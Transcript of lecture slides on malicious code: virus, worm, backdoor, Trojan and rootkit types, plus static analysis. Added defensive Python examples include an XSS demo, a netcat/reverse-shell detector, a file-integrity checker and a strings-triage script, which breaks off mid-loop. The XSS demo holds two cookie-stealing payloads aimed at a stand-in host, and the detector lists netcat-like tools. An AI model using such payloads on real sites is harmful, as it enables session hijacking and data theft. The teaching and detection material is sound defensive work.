CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS

Jan 11, 2016


Brittany Bryan
Transcript
Page 1:

CHAPTER 1 Malicious code in computer network

Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS

Page 2:

What is malicious code

• Malicious code is a program, or a fragment of code inserted into another program, that runs a destructive process on a computer: it destroys or corrupts data and undermines the security and integrity of the system.

• In short, malicious code is an instruction set that makes a computer act according to the attacker's intention rather than the owner's.

Page 3:

The purposes of malicious code

• Show off technical skill / prank

• Remote control of victims

• Steal private information

• Steal resources (CPU time, bandwidth, storage)

• Launch DDoS attacks against other services

Page 4:

The history of malicious code

• 1949: Von Neumann put forward the notion of a self-replicating program
• 1961: Darwin, the first program-versus-program game; 1970: Conway's Game of Life
• 1971: The first "virus", Creeper, spread on ARPANET
• 1983: Fred Cohen gave the definition of a computer virus
• 1986: The first PC virus, Brain
• 1988: The first Internet worm, the Morris Worm
• 1990: SunOS rootkit
• 1995: The concept of the macro virus
• 1998: CIH, the first virus that damaged computer hardware (it overwrote the flash BIOS)
• 1998: The most famous backdoor, Back Orifice

Page 5:

The history of malicious code

• 1999-2000: Melissa, ILOVEYOU
• 2001: Code Red I/II, Nimda
• 2002: Reverse-connection Trojan Setiri
• 2003-2004: Outbreak of worms
  – 2003: Slammer, Blaster, Nachi, Sobig…
  – 2004: Mydoom, Witty, Sasser, Santy…
• 2007-2008: Storm worm

Page 6:

Outline

• 1.1 Different types of malicious code
  – 1.1.1 Virus
  – 1.1.2 Worm
  – 1.1.3 Malicious mobile code
  – 1.1.4 Backdoor
  – 1.1.5 Trojan
  – 1.1.6 RootKit

• 1.2 Overview of malicious code analysis and detection
  – 1.2.1 Overview of malicious code analysis
  – 1.2.2 Static analysis technology
  – 1.2.3 Dynamic analysis technology

Page 7:

1.1 Different types of malicious code

Page 8:

1.1.1 Virus

• Definition:
  – A self-replicating program that spreads by inserting copies of itself into other executable code or documents. Unlike a worm, a virus usually needs user action (running the infected program or opening the infected document) to spread.

• Properties:
  – Infectious
  – Latent (it may lie dormant for a long time before acting)
  – Triggerable (it activates on a condition such as a date or an event)
  – Destructive
  – Derivative (new variants are easily derived from existing viruses)

Page 9:

Virus

Figure: the Panda Burning Incense virus

Page 10:

Virus

• In general a virus replicates itself and inserts copies into other executable code or documents. It is usually embedded in a host program; when the infected host runs, the virus code runs and replicates.

• Viruses have different purposes. Some are written as pranks; others are written to destroy.

• This lecture groups viruses into the following categories: file viruses, boot sector viruses, macro viruses and hoax ("prank") e-mails.

Page 11:

File virus

• A file virus attaches itself to executable files (.exe, .com, .sys, .dll and similar); documents such as Word and Excel files are the territory of macro viruses.
  – When an infected program runs, the virus replicates into other programs on the system, and into other systems that share or copy the infected file.
  – In addition, the virus may stay resident in memory so that every program subsequently run is infected.
  – Another infection technique changes the program's flow of execution rather than overwriting its code: the virus patches the entry point so that the infected program executes the virus before its own code.

Page 12:

Boot sector virus

• A boot sector virus infects the master boot sector of a hard disk or the boot sector of removable media.
  – The boot sector is the first sector of a disk or partition, not an area of memory. It stores the data structure definitions for the file system and holds the bootstrap program that loads the operating system.
  – The master boot sector (MBR) is an independent area at the start of the hard disk; the BIOS loads and executes its bootstrap code at power-on, before any operating system runs. When an infected disk is read during booting, the virus executes first and can take control of the whole system.
  – Boot sector viruses hide well, because they run before the operating system and any anti-virus software, and the damage they cause can be beyond repair. On modern systems UEFI Secure Boot and measured boot are the main defenses against this class.

Page 13:

Macro virus

• Macro viruses became popular in the late 1990s and remain a common infection vector through Office documents.
• As the name says, a macro virus replicates through programs written in an application's macro language.
  – Much software (word processors, spreadsheets) uses a macro language to automate jobs, and a macro virus uses that capability to spread its malicious code.
  – Because users often share document files containing macros, the virus spreads quickly.
  – A macro virus typically infects the application's global template (for example Word's Normal.dot), so every document created or opened afterwards is infected as well.

Page 14:

Prank E-mail (hoax)

• This kind of "virus" is a fake virus warning. It threatens the user with some damage or claims the system is about to be infected.

• Although the warning is false, it spreads just like a real virus: propagation depends on well-meaning victims who forward it to other users.

• Usually a hoax is not destructive in itself, but some instruct users to delete files or change system settings, which damages the security of the system.

Page 15:

Infection mechanisms of virus

• Prefix infection: the virus code is placed before the host's code, so it runs first and then hands control to the original program.

• Suffix infection: the virus code is appended to the end of the host file and the entry point is patched to jump to it; this is the most common mechanism because it is the easiest to do without corrupting the host.

• Insertion infection: the virus code is written into unused space inside the host (padding or gaps between sections), so the file size does not change and the infection is harder to notice.

Page 16:

Propagation modes of virus

• Portable storage devices: floppy disks, USB flash drives

• E-mail: attachments carrying the virus (e-mail viruses)

• File sharing: SMB shares, NFS, P2P networks

Page 17:

1.1.2 Worm

• A worm is a self-contained, self-replicating program whose propagation does not need a host program.

• Its replication differs from a virus's: it creates copies of itself and executes them automatically, without user interaction.

• A worm breaks in through vulnerabilities and insecure configuration. Because no user action is needed, it spreads at very high speed.

Page 18:

Defining characteristics of worm

• Stand-alone programs that don't need a host

• Spread via the network

• Self-replicate automatically

• Infect and spread without user interaction

Page 19:

Propagation modes of worm

• Exploiting vulnerabilities in network services

• Spreading via shared network directories

• Spreading via E-mail

Page 20:

Components of worm

Figure: components of a worm

Page 21:

Components of worm

• Breaking a worm down into its building blocks, we see:
  – The warhead contains the exploits used to break into a system, such as buffer overflows, file-sharing or e-mail attacks.
  – The propagation engine moves the worm body to the target system.
  – The payload contains code to take some action on the target. Some worms carry backdoors, denial-of-service flooding tools, or password-cracking programs.
  – The target selection algorithm chooses new addresses to probe, while the scanning engine actually checks each address to see whether it is vulnerable.

Page 22:

Superworm

• The worms we've seen so far have been relatively benign, especially compared with the superworms on the drawing boards of various worm developers.

• Superworms will attack multiple operating systems, and will include multiple exploits for breaking into targets.

• Attackers will put zero-day exploits into worms to break into our systems through vulnerabilities we have never seen before.

Page 23:

Superworm

• Superworms will spread like wildfire, using the pre-scanning (hit-list) techniques of the Warhol worm to take over most vulnerable systems within an hour.

• To evade detection, such worms will include polymorphic and metamorphic code so that no two copies look alike. Finally, the superworms will actually do something nasty when they reach a target.

Page 24:

1.1.3 Malicious mobile code

• Mobile code is a lightweight program that is downloaded from a remote system and executed locally with minimal or no user intervention.

• Malicious mobile code is mobile code that makes your system do something that you do not want it to do.

Page 25:

Common malicious mobile code

• Browser scripts

• ActiveX controls

• Java applets

Page 26:

Browser scripts

• Browser scripts are embedded in HTML documents as plain-text commands designated by the script tag, and are usually written using JavaScript or VBScript.

• One of the ways in which an attacker can misuse the functionality available to the script is by overwhelming the browser with repetitive tasks.

• Malicious sites might also use scripts in an attempt to hijack the visitor's browser by jumping to unwanted Web sites, resizing the screen, resetting the home page, and adding bookmarks.

Page 27:

Browser scripts

• Malicious browser scripts also play an active role in stealing the victim's session cookies, which lets an attacker take over someone's browsing session without supplying credentials.

• One way of gaining unauthorized access to cookies is exploiting flaws in the implementation of the browser's cookie-protection mechanisms (the same-origin policy).

• Another approach, cross-site scripting (XSS), injects a script into a vulnerable Web site, typically through user input the site echoes back unescaped, so that the victim's browser executes the attacker's code when viewing the affected page.
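As an added example (not from the slides), the Python below shows the cross-site scripting sink the slide describes beside its hardened form, and the cookie attributes that limit what a stolen session is worth. The comment-rendering functions, the two payloads and the 203.0.113.9 collector address are constructed for illustration; the check that lists injected elements uses only the standard library's HTML parser.

```python
import html
from html.parser import HTMLParser

# Constructed payloads of the kind a malicious comment would carry.
COOKIE_THEFT = "<script>new Image().src='http://203.0.113.9/c?'+document.cookie</script>"
ATTR_BREAKOUT = '"><img src=x onerror="fetch(\'http://203.0.113.9/c?\'+document.cookie)">'


def render_comment_vulnerable(author, body):
    """Reflects untrusted strings straight into markup: an XSS sink."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author, body):
    """Escapes at the point of output for the HTML text context."""
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def injected_elements(rendered, template_tags=("div", "b")):
    """Names of elements the template did not emit, plus any on* event-handler
    attribute (the template never uses one): both mean script can run."""
    parser = _TagCollector()
    parser.feed(rendered)
    found = []
    for tag, attrs in parser.tags:
        if tag not in template_tags:
            found.append(tag)
        found.extend(name for name in attrs if name.startswith("on"))
    return found


def session_cookie_header(session_id, secure=True):
    """Set-Cookie line for a session token that page script cannot read.

    HttpOnly keeps document.cookie (the usual exfiltration path) from seeing
    the token even when a script does run; SameSite=Lax stops the browser
    attaching it to cross-site requests; Secure keeps it off plaintext HTTP."""
    flags = ["Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        flags.append("Secure")
    return "Set-Cookie: session=" + session_id + "; " + "; ".join(flags)


if __name__ == "__main__":
    for payload in (COOKIE_THEFT, ATTR_BREAKOUT):
        print("vulnerable:", injected_elements(render_comment_vulnerable("mallory", payload)))
        print("safe:      ", injected_elements(render_comment_safe("mallory", payload)))
    print(session_cookie_header("0123456789abcdef"))
```

Escaping is context-specific: `html.escape` is right for text between tags and for quoted attribute values, but a value placed inside a JavaScript block or a URL needs that context's encoding instead. The cookie flags are the second line of defense; they do not fix the injection, they only deny the script the session token.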

Page 28:

Browser scripts

Figure: a demo that uses JavaScript to create and resize browser windows spelling out a word, one letter per window

Page 29:

ActiveX controls

• ActiveX controls are full-fledged programs that run with the access privileges of a regular Windows application.
  – Site developers embed an ActiveX control in an HTML page with the object tag, specifying the unique class identifier (CLSID) of the desired control.
  – If the developer of the control marked it "safe for scripting", it can be driven by any browser script, including a malicious one.
  – Powerful ActiveX controls erroneously marked safe for scripting act as a window through which malicious code can enter the system, as happened with the Scriptlet.Typelib and Eyedog exploits.

Page 30:

ActiveX controls

• The Authenticode methodology, developed by Microsoft, allows developers to cryptographically sign their mobile code.

• Signing lets users decide whether to allow an ActiveX control to run depending on who authored it.

• Unfortunately, a signature does not vouch for good intentions: an attacker can sign a malicious control with a certificate of his own, since a signature only identifies the signer. Once the user agrees to run a malicious ActiveX control, it has unrestricted access to the victim's system.

• Malicious mobile code can also take the form of browser plug-ins; plug-ins written for Internet Explorer as special ActiveX controls are called Browser Helper Objects (BHOs).

Page 31:

ActiveX controls

Figure: a security warning asks the user whether to fully trust the author of the downloaded ActiveX control

Page 32:

Java applets

• Java applets are programs written in the Java programming language in a way that allows them to be embedded in Web pages.

• Like all Java programs, applets run on multiple operating systems and execute within the confines of the JRE. Unsigned applets downloaded from the Internet are subject to strict sandbox restrictions:
  – They cannot access the machine's file system or registry, and can only open network connections to the host from which they were retrieved.

• The Java security model also allows administrators to enforce granular access restrictions on cryptographically signed applets; however, if a user agrees to run a signed applet for which no security policy was defined, the applet runs with the full privileges of the user. Modern browsers no longer run applets at all, but the same trust problem applies to any signed code a user is asked to accept.

Page 33:

Java applets

Figure: an untrusted malicious applet crashing a vulnerable Opera browser

Page 34:

1.1.4 Backdoor

• A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker's own terms.

Page 35:

Backdoors could give the attacker many different types of access, including the following:

• Local escalation of privilege:
  – This type of backdoor lets an attacker who already has an account on the system change their privilege level to root or Administrator.
  – With these superuser privileges, the attacker can reconfigure the box or access any file stored on it.

• Remote execution of individual commands:
  – Using this type of backdoor, an attacker sends a message to the target machine to execute a single command at a time.
  – The backdoor runs the attacker's command and returns the output to the attacker.

Page 36:

Backdoors could give the attacker many different types of access, including the following:

• Remote command-line access:
  – Also known as a remote shell, this type of backdoor lets the attacker type directly into a command prompt of the victim machine from across the network. The attacker can use all the features of the command line, including running a series of commands, writing scripts, and selecting groups of files to manipulate.
  – Remote shells are more powerful than remote execution of individual commands because they simulate the attacker having direct access to the keyboard of the target system.

• Remote control of the GUI:
  – Rather than working with command lines, some backdoors let an attacker see the GUI of the victim machine, control mouse movements, and enter keystrokes, all across the network.
  – With remote control of the GUI, the attacker can watch everything the victim does on the machine as well as operate it.

Page 37:

All-purpose network connection gadget: Netcat

• Netcat is a simple program that connects standard input and output to TCP and UDP ports on the network.
  – With this capability, it is often abused as a backdoor.
  – Using Netcat, an attacker can create a passive backdoor, a shell listener waiting for a connection, or an active one, a "reverse shell" that connects out from the victim and shovels a shell across the network to the attacker.
  – The latter technique gets around firewalls that block incoming connections but allow outbound ones, which is why egress filtering matters.
  – Cryptcat is a variant of Netcat that encrypts the stream with a symmetric cipher, so the commands and their output are not visible to network monitoring.
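The two Netcat backdoor shapes above, a listener waiting for the attacker and a shell shoveled out to the attacker, leave a recognisable footprint in the socket table. The script below is an added example, not from the slides: it parses `ss -tnap` style output (the sample is constructed) and flags netcat-like binaries in the LISTEN state and shell processes whose standard input or output is an established socket.

```python
import re

# Constructed sample of `ss -tnap` output: sshd is benign, port 4444 is a
# netcat listener, and the bash process holding an established outbound
# socket on fd 0 is a shoveled (reverse) shell.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN 0      1      0.0.0.0:4444         0.0.0.0:*          users:(("nc",pid=2331,fd=3))
ESTAB  0      0      10.0.0.5:22          10.0.0.9:50211     users:(("sshd",pid=2402,fd=4))
ESTAB  0      0      10.0.0.5:51234       203.0.113.7:443    users:(("bash",pid=2440,fd=0))
"""

NETCAT_LIKE = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd", "socat", "cryptcat"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

_PROC = re.compile(r'users:\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')


def parse_ss(output):
    """Return (state, local, peer, process_name, pid) for each socket line."""
    rows = []
    for line in output.splitlines()[1:]:          # skip the column header
        parts = line.split()
        if len(parts) < 6:
            continue
        state, local, peer = parts[0], parts[3], parts[4]
        m = _PROC.search(line)
        if m:
            rows.append((state, local, peer, m.group("name"), int(m.group("pid"))))
    return rows


def find_backdoor_candidates(output):
    """Flag the two Netcat patterns from the slide: a passive shell listener
    (a netcat-like binary in LISTEN) and a shoveled shell (a shell process
    attached to an established socket)."""
    findings = []
    for state, local, peer, name, pid in parse_ss(output):
        if state == "LISTEN" and name in NETCAT_LIKE:
            findings.append((pid, name, f"netcat-like listener on {local}"))
        elif state == "ESTAB" and name in SHELLS:
            findings.append((pid, name, f"shell attached to socket {local} -> {peer}"))
    return findings


if __name__ == "__main__":
    for pid, name, why in find_backdoor_candidates(SAMPLE_SS_OUTPUT):
        print(f"pid {pid} ({name}): {why}")
```

On a live host run `ss -tnap` as root so process names appear for every socket. The check is only as honest as the kernel answering it: a kernel-mode rootkit (later in this chapter) can hide a socket from `ss` entirely, so cross-check against a capture taken on the network side.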

Page 38:

All-purpose network connection gadget: Netcat

Figure: Netcat in client mode and listen mode connecting standard input and standard output with the network

Page 39:

Remote GUI control: VNC

• Many tools transmit GUI control across the network, including the very popular VNC. A VNC server can passively wait for connections, or actively shovel a GUI across the network to a listening viewer.

• In publicly released versions of WinVNC, the server always shows up in the system tray or as a running service. Modified, non-public versions mask their presence in the GUI.

• VNC can be installed remotely by importing its configuration into the registry and starting the service, which is why unexpected VNC services and registry keys are worth checking for.

Page 40:

Remote GUI control: VNC

Figure: controlling a VNC server using the VNC Viewer

Page 41:

Backdoors without ports

• To increase their stealthiness, not all backdoors listen on TCP or UDP ports.
  – Some tools use ICMP, carrying commands in the payload of echo packets.
  – Others use a sniffer, in non-promiscuous or promiscuous mode, and watch the traffic reaching the interface for a trigger packet instead of binding a port.

• Because they don't use a port, they are more difficult to detect with netstat-style tools; what remains visible is a process holding a raw socket, or an interface in promiscuous mode.

• Promiscuous sniffers can confuse investigators, because the trigger packet can be addressed to another system on the LAN, making the backdoor appear to be on that system. Sniffing in a switched environment is possible using ARP cache poisoning.

Page 42:

1.1.5 Trojan

Figure: the Trojan War

Page 43:

Trojan

• Origin: Trojan war

• Definition: A Trojan horse is a program that appears to have some useful or benign purpose, but really masks some hidden malicious functionality.

Page 44:

Camouflage mechanisms of Trojan

• Name camouflage (a file name or icon that mimics a legitimate program)

• Software packaging (bundling the Trojan with a legitimate installer)

• Hijacking a software publisher (compromising a legitimate vendor's distribution channel so that the Trojan arrives as a trusted update)

Page 45:

Different types of Trojan

• Remote access Trojan

• Password-stealing Trojan

• Keystroke-logging Trojan

• Destructive Trojan

Page 46:

Remote access Trojan

• This kind of Trojan is very popular today: it provides remote control and is easy to use.

• Once the victim runs the server component and the attacker learns the host's IP address, the attacker can access the host at will.

Page 47:

Password-stealing Trojan

• This kind of Trojan is devoted to finding all the passwords stored on the host and sending them to a mailbox chosen by the attacker.

• Most of them run once and send an e-mail rather than installing themselves to load automatically at every reboot.

Page 48:

Keystroke-logging Trojan

• This kind of Trojan is very simple: it records every keystroke into a log file.

• It starts as the system boots, keeps a record of every user event and sends the log to the attacker via e-mail.

Page 49:

Destructive Trojan

• This kind of Trojan destroys or deletes files.

• It can delete all the dynamic link libraries or executable files on a host, or even format the user's hard disk.

Page 50:

1.1.6 RootKit

• Definition: RootKits are Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to a machine and hide on it.

Page 51:

Different types of RootKit

• User-mode RootKit
  – UNIX user-mode RootKit
  – Windows user-mode RootKit

• Kernel-mode RootKit
  – Linux kernel-mode RootKit
  – Windows kernel-mode RootKit

Page 52:

UNIX User-Mode RootKit

The tools bundled together in most user-mode RootKits on UNIX can be broken into five different areas:

• Binary replacements that provide backdoor access. These tools are the heart of the user-mode UNIX RootKit.
  – By overwriting the programs and services used to access the machine (login, sshd and the like), the attacker installs replacements that let him log in through various backdoors, for example with a hard-coded password.
  – When a backdoor is used, the attacker is immediately granted root privileges on the target system.

Page 53:

UNIX User-Mode RootKit

• Binary replacements to hide the attacker.
  – These tools overwrite existing binaries on the system (ls, ps, netstat and so on), replacing them with Trojan horse versions that let an attacker hide.
  – The new binaries lie to users and administrators about the attacker's files, processes, and network usage on the victim machine.

• Other tools for hiding that don't replace binary programs.
  – These programs let attackers alter the system to hide their activities without replacing commands. They support the RootKit with features such as resetting the last modification time of a program to disguise the alterations made when installing the RootKit.
  – Others remove evidence of a particular account's usage from the box (the wtmp, utmp and lastlog records). Still others let the attacker edit logs.

Page 54:

UNIX User-Mode RootKit

• Additional odds and ends.
  – Many UNIX RootKits also include other tools useful to an attacker on the target system.
  – Some RootKits come with a built-in sniffer for gathering traffic from the LAN, which might include valuable clear-text user IDs and passwords.
  – Backdoor shell listeners are another popular option bundled with RootKits.

Page 55:

UNIX User-Mode RootKit

• Installation script.
  – This program unpacks the other bundled RootKit tools, compiles them if necessary, and moves them to the appropriate locations.
  – Rather than manually pushing every binary into place and hand-crafting it to fit the system, the automated installation script runs through the entire process, which usually takes a mere 10 seconds or less.
  – After the replacement programs are in place, the script resets the last modification date and may compress or pad the replacement binaries so that they are the same length as the original programs. Size and timestamp checks therefore do not catch a rootkit; only a cryptographic hash of the file contents, compared against a baseline kept off the host, does.
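An integrity check that survives the installer's tricks above. The script below is an added example, not from the slides: it builds a baseline of SHA-256 hashes for a directory tree, then reports files whose contents changed even though size and mtime were restored, as well as files that were added or removed. The demo directory, the fake "binaries" and the dropped `.sniffer` file are constructed in a temporary directory. The same check catches the prefix, suffix and insertion infections from Page 15, since all three change the file contents.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map of relative path -> {sha256, size, mtime} for every regular file."""
    root = Path(root)
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            st = p.stat()
            baseline[p.relative_to(root).as_posix()] = {
                "sha256": sha256_of(p), "size": st.st_size, "mtime": st.st_mtime}
    return baseline


def compare_to_baseline(root, baseline):
    """Sorted (path, verdict) pairs for files that differ from the baseline."""
    current = build_baseline(root)
    findings = []
    for rel, old in baseline.items():
        new = current.get(rel)
        if new is None:
            findings.append((rel, "missing"))
        elif new["sha256"] != old["sha256"]:
            # A rootkit installer resets mtime and pads size; the hash still moves.
            camouflaged = new["size"] == old["size"] and new["mtime"] == old["mtime"]
            findings.append((rel, "modified (size and mtime unchanged)" if camouflaged else "modified"))
    for rel in current.keys() - baseline.keys():
        findings.append((rel, "added"))
    return sorted(findings)


def demo():
    """Constructed scenario: a fake bin/ directory, a baseline, then a same-length
    trojaned 'ps' with its mtime restored, plus a dropped sniffer binary."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        for name in ("ls", "ps", "netstat"):
            (root / "bin" / name).write_bytes(b"\x7fELF " + name.encode() + b" original")
        baseline = build_baseline(root)

        ps = root / "bin" / "ps"
        st = ps.stat()
        ps.write_bytes(b"\x7fELF ps trojaned")              # same length as "\x7fELF ps original"
        os.utime(ps, ns=(st.st_atime_ns, st.st_mtime_ns))   # the installer's timestamp reset
        (root / "bin" / ".sniffer").write_bytes(b"\x7fELF sniffer")
        return compare_to_baseline(root, baseline)


if __name__ == "__main__":
    for path, verdict in demo():
        print(f"{verdict:40} {path}")
```

Keep the baseline off the host (read-only media or a remote store) and run the comparison from a clean boot medium: a kernel-mode rootkit, covered a few pages on, can hook the read calls the hasher relies on and hand back the original bytes, so a check run on the compromised kernel proves nothing.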

Page 56:

Windows User-Mode RootKit

Three different methods for implementing user-mode RootKits on Windows:

• Use existing interfaces (such as Windows hooks) to insert malicious code between applications and existing Windows functions

• Disable Windows File Protection and overwrite system files on the hard drive

• Use DLL injection and API hooking to manipulate running processes in memory

Page 57:

Windows User-Mode RootKit

Figure: three different methods for implementing user-mode RootKits on Windows

Page 58:

Linux Kernel-Mode RootKit

Five different strategies to manipulate a Linux kernel

• Using evil loadable kernel modules. These modules typically alter the system call table so that entries point to the attacker's code; in a sense, the attacker implements API hooking inside the kernel itself. Adore and KIS are two tools that use this technique. To survive a reboot, the attacker often alters the init daemon or its scripts so that the module is reloaded at system boot.

• Altering /dev/kmem. Writing directly to /dev/kmem allows an attacker to patch the running kernel without loading a module at all. Recent kernels no longer provide /dev/kmem, and module signature enforcement and kernel lockdown restrict the first technique as well.

Page 59:

Linux Kernel-Mode RootKit

• Patching the kernel image file. An attacker can patch the kernel image on the hard drive by changing the vmlinuz file, building the evil kernel code right into the kernel image itself.

• Creating a fake system with UML (User-Mode Linux). With UML, an attacker can run a guest operating system that administrators and users believe is the real system, while the attacker owns and controls the underlying host operating system.

• Altering the kernel with KML (Kernel-Mode Linux). KML extends the kernel so that user-mode programs run in Ring 0 and have direct access to kernel structures.

Page 60:

Windows Kernel-Mode RootKit

Five different strategies to manipulate a Windows kernel

• Evil device drivers. The most popular Windows kernel attacks involve device drivers that manipulate interrupt handling, system service dispatching (the SSDT), or the underlying kernel functions that implement system services. Each of these techniques is really a form of API hooking.

• Alter a running kernel in memory. An attacker can alter a running kernel in memory by manipulating the Global Descriptor Table or by writing through the \Device\PhysicalMemory object.

Page 61:

Windows Kernel-Mode RootKit

• Overwrite the kernel image on the hard drive. To patch the kernel image file on disk, the attacker first must alter the boot loader (NTLDR on the Windows versions this lecture describes) to disable its kernel integrity check. Current Windows versions add driver signature enforcement and Secure Boot, so kernel-mode rootkits today usually need a signed driver of their own or a vulnerable one already present.

• Deploy a kernel on a virtual system. Employ a virtual machine environment such as VMware or Virtual PC to create a fake system that is a prison for administrators and users.

• Try to run user-mode code at the kernel level. An attacker could alter the kernel so that user-mode programs run in Ring 0, thereby implementing a kernel-mode Windows tool.

Page 62:

1.2 Overview of malicious code analysis and detection

Page 63:

1.2.1 Overview of malicious code analysis

• Malicious code has become increasingly frequent, damaging the security of information systems. To speed up emergency response, it is necessary to monitor the state of the host and the behavior of the malicious code so that it can be analyzed rapidly.

• Malicious code analysis is the basis of network emergency response. Through testing and analysis of host state information, we learn the basic functions of the malicious code, grasp the damage it may do, and gather the information needed to recover the victim system.


Page 65:

The contents of the analysis:

• Because malicious code writers have a special intent, the malicious code itself has unique characteristics, in both its technical mechanisms and the functions it needs, compared with ordinary applications.

• The main task of analysis is to identify these characteristics, so that we understand the technical trends in malicious code and lay the foundation for detection and prevention.

Page 66:

We need to analyze the following:

• Concealment

• Encryption

• Trigger conditions

• Persistence (auto-start)

• Autonomous attack and reproduction

• Damage function

Page 67:

Contents of the analysis

• Concealment. Most malicious code is capable of staying hidden on the target machine for a long time; code that cannot hide is quickly exposed and removed. So we need to analyze how it hides on the host (files, processes, registry entries) and how it hides its network communication.

• Encryption. Malicious code uses encryption in two ways. Encrypting the program itself (packing) defeats signature recognition by anti-virus software; most packers also compress, which reduces the size of the PE file and raises its byte entropy. Encrypting traffic prevents network monitoring and lets attackers circumvent firewall and intrusion detection rules.


• Trigger condition. Malicious code does not start all of its functional modules as soon as it runs, but only when certain trigger conditions are satisfied. Trigger conditions include timers, associated events, commands received over the network, etc.

• Autostart function. In order to keep working on the controlled host after the next reboot, almost every malicious program has an autostart function. Some malicious code also tries to keep running after it has been discovered, which shows how persistent malicious code can be.


• Autonomous attack and self-replication. Many malicious programs can attack on their own: they copy themselves from one host to another in order to spread. There are many differences between malicious code attacks and the behavior of a human attacker. A malicious program's attack is very limited, usually targeting only three or four vulnerabilities, and its scanning is fused with the attack itself.

• Damage function. Malicious code is called "malicious" because of the damage it does. The severity depends on the specific program: some collect local information, some consume local resources, and some use the host as a springboard to attack other machines. Once we understand the damage function of a malicious program, we can assess the losses.


Analysis technologies

• There are many types of malicious code analysis technology. They are divided into two categories according to whether the malicious code is executed during analysis:

• Static analysis technology
• Dynamic analysis technology


1.2.2 Static analysis technology

• Static analysis technology analyzes malicious code without executing it, so the analysis system cannot be damaged. It includes disassembly analysis, source code analysis, binary statistical analysis, etc.

• In the early days this method took the form of static signature scanning, which is still widely used in the anti-virus field. The technology is mature, and most of the work lies in extracting and analyzing signatures.

• In this way we can analyze the general structure of the malicious code and the system calls it uses, and work out how to turn its destructive behavior into a removal procedure, which code can serve as a signature for the malicious code, and how to prevent this kind of malicious code.


Four categories of static analysis method

• The malicious code analysis software

• Strings analysis

• Scripts analysis

• Disassembly analysis


The malicious code analysis software

• Anti-virus software detects malicious code with signature scanning, checksum (integrity) checking and software emulation.

• If the anti-virus software already holds analysis data for the malicious code, its analysis results can be used directly.

• If there is no such data, more information can be searched for on the Internet using the name and other characteristics of the malicious code.


Strings analysis

• The aim of strings analysis is to find the continuous runs of printable characters in the malicious code file, whether encoded as ASCII or in another encoding such as UTF-16.

• Many malicious programs contain a number of strings that reveal the libraries and programs the malicious code uses.

Page 77: CHAPTER 1 Malicious code in computer network Funded by Intel Corp. MALICIOUS CODE DEFENSE IN MOBILE NETWORKS.

Search through the malicious code samples for the following information:

• The name of the malicious code;
• Help text and command line options;
• User dialog box text;
• Backdoor passwords;
• URLs related to the malicious code;
• The author's or the attacker's e-mail address;
• Libraries, function calls and other executable files the malicious code uses;
• Other useful information.
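As an added example (not from the original slides), the following Python script carries out the strings analysis described above on a constructed byte string that stands in for a sample file: it extracts runs of printable ASCII and UTF-16LE text, in file order, and sorts them into the kinds of evidence listed (URLs, e-mail addresses, module names, API names, command line options, autostart registry paths). The sample bytes, the category names and the list of noteworthy API names are assumptions made for this example.

```python
import re
from collections import defaultdict
from typing import Dict, List

MIN_LEN = 4
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# UTF-16LE text as Windows binaries store it: each printable byte followed by 0x00
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

# API names worth flagging when found as plain strings (assumed list for this example)
NOTEWORTHY_APIS = {
    "CreateRemoteThread", "WriteProcessMemory", "VirtualAllocEx",
    "SetWindowsHookExA", "URLDownloadToFileA", "InternetOpenA", "connect",
}

# Constructed stand-in for a sample file: binary junk with ASCII and UTF-16LE
# strings mixed in. Not a real malware sample.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"kernel32.dll\x00\x01\x02\x03"
    + b"CreateRemoteThread\x00WriteProcessMemory\x00"
    + b"ws2_32.dll\x00connect\x00"
    + b"http://198.51.100.23/gate.php\x00"
    + b"-install -silent -pass\x00"
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00\x00\x00\x00"
    + "Remote Access Tool v1.2".encode("utf-16le") + b"\x00\x00"
    + b"\x7f\x01ab\x00"          # "ab" is shorter than MIN_LEN and must be skipped
    + b"admin@attacker.example\x00"
)


def extract_strings(data: bytes) -> List[str]:
    """Return printable ASCII strings followed by UTF-16LE strings, in file order."""
    found = [m.group().decode("ascii") for m in ASCII_RE.finditer(data)]
    found += [m.group().decode("utf-16le") for m in WIDE_RE.finditer(data)]
    return found


def classify(s: str) -> str:
    """Map one string to the kind of evidence the slides list; the order of checks matters."""
    if re.match(r"https?://", s):
        return "url"
    if re.fullmatch(r"[\w.+-]+@[\w-]+(\.[\w-]+)+", s):
        return "email"
    if re.fullmatch(r"(\d{1,3}\.){3}\d{1,3}(:\d+)?", s):
        return "ip"
    if "\\currentversion\\run" in s.lower() or s.upper().startswith("HKEY_"):
        return "autostart_registry"
    if re.search(r"\.(dll|exe|sys)$", s, re.IGNORECASE):
        return "module"
    if s in NOTEWORTHY_APIS:
        return "api"
    if re.match(r"^(--?|/)\w", s):
        return "cmdline_option"
    return "other"


def triage(data: bytes) -> Dict[str, List[str]]:
    """Group every extracted string under its classification."""
    report = defaultdict(list)
    for s in extract_strings(data):
        report[classify(s)].append(s)
    return dict(report)


if __name__ == "__main__":
    for kind, items in triage(SAMPLE).items():
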